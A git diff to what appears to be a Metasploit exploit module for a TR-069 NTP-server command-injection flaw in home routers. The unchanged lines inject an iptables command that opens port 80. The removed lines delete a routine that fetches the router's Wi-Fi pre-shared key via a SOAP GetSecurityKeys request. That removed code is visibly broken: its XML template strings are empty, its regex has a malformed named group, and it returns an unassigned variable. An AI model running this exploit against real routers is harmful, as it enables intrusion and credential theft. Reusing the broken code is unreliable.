diff --git a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
index 11b5fad451..a61f5d6272 100644
--- a/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
+++ b/modules/exploits/linux/http/tr069_ntpserver_cmdinject.rb
@@ -98,8 +98,6 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Exploiting...")
print_status("Dropping firewall on port 80...")
execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
- key = get_wifi_key()
- print_status("WiFi key is #{key}")
execute_command("tick.eircom.net","")
end
@@ -123,34 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
- def get_wifi_key()
- print_status("Getting the wifi key...")
- uri = '/UD/act?1'
- soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
- data_cmd_template = ""
- data_cmd_template << ""
- data_cmd_template << " "
- data_cmd_template << " "
- data_cmd_template << " "
- data_cmd_template << " "
- data_cmd_template << ""
- data_cmd= data_cmd_template
-
- begin
- res = send_request_cgi({
- 'uri' => uri,
- 'ctype' => "text/xml",
- 'method' => 'POST',
- 'headers' => {
- 'SOAPAction' => soapaction,
- },
- 'data' => data_cmd
- })
-
- /NewPreSharedKey>(?.*)<\/NewPreSharedKey/ =~ res.body
- return key
- rescue ::Rex::ConnectionError
- fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
- end
- end
end